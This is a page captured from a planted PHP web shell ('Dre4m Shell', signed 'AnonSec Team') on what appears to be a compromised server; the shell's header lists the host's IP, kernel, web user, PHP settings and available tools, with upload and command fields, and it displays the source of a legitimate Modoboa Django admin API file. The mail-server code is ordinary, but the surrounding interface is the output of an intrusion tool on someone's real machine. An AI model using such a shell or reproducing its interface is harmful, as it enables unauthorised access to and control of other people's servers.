Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 13.58.147.19
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /srv/modoboa/env/lib64/python3.5/site-packages/modoboa/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /srv/modoboa/env/lib64/python3.5/site-packages/modoboa/admin/api.py
"""Admin API."""

from django import http
from django.contrib.contenttypes.models import ContentType
from django.utils.translation import ugettext as _

from rest_framework import filters, status, viewsets
from rest_framework.decorators import action
from rest_framework.exceptions import ParseError
from rest_framework.permissions import DjangoModelPermissions, IsAuthenticated
from rest_framework.response import Response

from modoboa.core import models as core_models
from modoboa.core import sms_backends

from . import lib, models, serializers


class DomainViewSet(viewsets.ModelViewSet):
    """
    retrieve:
    Return the given domain.

    list:
    Return a list of all existing domains.

    create:
    Create a new domain instance.
    """

    permission_classes = [IsAuthenticated, DjangoModelPermissions, ]
    serializer_class = serializers.DomainSerializer

    def get_queryset(self):
        """Filter queryset based on current user."""
        return models.Domain.objects.get_for_admin(self.request.user)

    def perform_destroy(self, instance):
        """Add custom args to delete call."""
        instance.delete(self.request.user)


class DomainAliasViewSet(viewsets.ModelViewSet):
    """ViewSet for DomainAlias."""

    permission_classes = [IsAuthenticated, DjangoModelPermissions, ]
    serializer_class = serializers.DomainAliasSerializer
    http_method_names = ["get", "post", "put", "delete"]

    def get_queryset(self):
        """Filter queryset based on current user."""
        queryset = models.DomainAlias.objects.get_for_admin(self.request.user)
        domain = self.request.query_params.get("domain")
        if domain:
            queryset = queryset.filter(target__name=domain)
        return queryset


class AccountViewSet(viewsets.ModelViewSet):
    """ViewSet for User/Mailbox."""

    filter_backends = [filters.SearchFilter]
    permission_classes = [IsAuthenticated, DjangoModelPermissions, ]
    search_fields = ("^first_name", "^last_name", "^email")

    def get_serializer_class(self):
        """Return a serializer."""
        action_dict = {
            "list": serializers.AccountSerializer,
            "retrieve": serializers.AccountSerializer,
            "password": serializers.AccountPasswordSerializer,
            "reset_password": serializers.ResetPasswordSerializer,
        }
        return action_dict.get(
            self.action, serializers.WritableAccountSerializer)

    def get_queryset(self):
        """Filter queryset based on current user."""
        user = self.request.user
        ids = user.objectaccess_set \
            .filter(content_type=ContentType.objects.get_for_model(user)) \
            .values_list("object_id", flat=True)
        queryset = core_models.User.objects.filter(pk__in=ids)
        domain = self.request.query_params.get("domain")
        if domain:
            queryset = queryset.filter(mailbox__domain__name=domain)
        return queryset

    @action(methods=["put"], detail=True)
    def password(self, request, pk=None):
        """Change account password."""
        try:
            user = core_models.User.objects.get(pk=pk)
        except core_models.User.DoesNotExist:
            raise http.Http404
        serializer = self.get_serializer(user, data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response()
        return Response(
            serializer.errors, status=status.HTTP_400_BAD_REQUEST)

    @action(detail=False)
    def exists(self, request):
        """Check if account exists.

        Requires a valid email address as argument. Example:

        GET /exists/?email=user@test.com

        """
        email = request.GET.get("email")
        if not email:
            raise ParseError("email not provided")
        if not core_models.User.objects.filter(email=email).exists():
            data = {"exists": False}
        else:
            data = {"exists": True}
        serializer = serializers.AccountExistsSerializer(data)
        return Response(serializer.data)

    @action(methods=["post"], detail=False)
    def reset_password(self, request):
        """Reset account password and send a new one by SMS."""
        sms_password_recovery = (
            request.localconfig.parameters
            .get_value("sms_password_recovery", app="core")
        )
        if not sms_password_recovery:
            return Response(status=404)
        serializer = self.get_serializer(data=request.data)
        serializer.is_valid(raise_exception=True)
        user = core_models.User.objects.filter(
            email=serializer.validated_data["email"]).first()
        if not user or not user.phone_number:
            return Response(status=404)
        backend = sms_backends.get_active_backend(
            request.localconfig.parameters)
        if not backend:
            return Response(status=404)
        password = lib.make_password()
        content = _("Here is your new Modoboa password: {}").format(
            password)
        if not backend.send(content, [str(user.phone_number)]):
            body = {"status": "ko"}
        else:
            # SMS was sent, now we can set the new password.
            body = {"status": "ok"}
            user.set_password(password)
            user.save(update_fields=["password"])
        return Response(body)


class AliasViewSet(viewsets.ModelViewSet):
    """
    create:
    Create a new alias instance.
    """

    permission_classes = [IsAuthenticated, DjangoModelPermissions, ]
    serializer_class = serializers.AliasSerializer
    http_method_names = ["get", "post", "put", "delete"]

    def get_queryset(self):
        """Filter queryset based on current user."""
        user = self.request.user
        ids = (
            user.objectaccess_set.filter(
                content_type=ContentType.objects.get_for_model(models.Alias))
            .values_list("object_id", flat=True)
        )
        queryset = models.Alias.objects.filter(pk__in=ids)
        domain = self.request.query_params.get("domain")
        if domain:
            queryset = queryset.filter(domain__name=domain)
        return queryset


class SenderAddressViewSet(viewsets.ModelViewSet):
    """View set for SenderAddress model."""

    permission_classes = [IsAuthenticated, DjangoModelPermissions, ]
    serializer_class = serializers.SenderAddressSerializer

    def get_queryset(self):
        """Filter queryset based on current user."""
        user = self.request.user
        mb_ids = (
            user.objectaccess_set.filter(
                content_type=ContentType.objects.get_for_model(models.Mailbox))
            .values_list("object_id", flat=True)
        )
        return models.SenderAddress.objects.filter(mailbox__pk__in=mb_ids)

Anon7 - 2022
AnonSec Team